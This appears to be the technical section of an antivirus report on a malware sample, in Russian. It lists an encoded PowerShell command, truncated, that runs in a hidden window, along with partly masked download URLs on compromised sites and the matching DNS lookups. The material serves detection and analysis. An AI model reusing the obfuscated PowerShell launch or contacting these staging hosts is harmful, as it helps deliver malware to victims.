Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABWAFQATABWAEoAdQBxAGwAPQAnAFMASQBRAE0AVwB2AHAAawAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYABjAFUAcgBJAFQAYABZAGAAUAByAE8AVABPAGAAYwBPAGwAIgAgAD...
- http://pa##tas.org/cgi-bin/besxXuq/
- http://pa###upre.com/conspiracy/PdetgL/
- http://pu###rfiz.net/spikyfishgames.com/EoEdAlyI/
- http://ra###ipress.com/wp-content/yL8PG960h2983/
- http://wh####edownfarm.com/wp-admin/Qkqig0vqd685w76/
- DNS ASK pa##tas.org
- DNS ASK pa###upre.com
- DNS ASK pu###rfiz.net
- DNS ASK ra###ipress.com
- DNS ASK wh####edownfarm.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABWAFQATABWAEoAdQBxAGwAPQAnAFMASQBRAE0AVwB2AHAAawAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYABjAFUAcgBJAFQAYABZAGAAUAByAE8AVABPAGAAYwBPAGwAIgAgAD...' (со скрытым окном)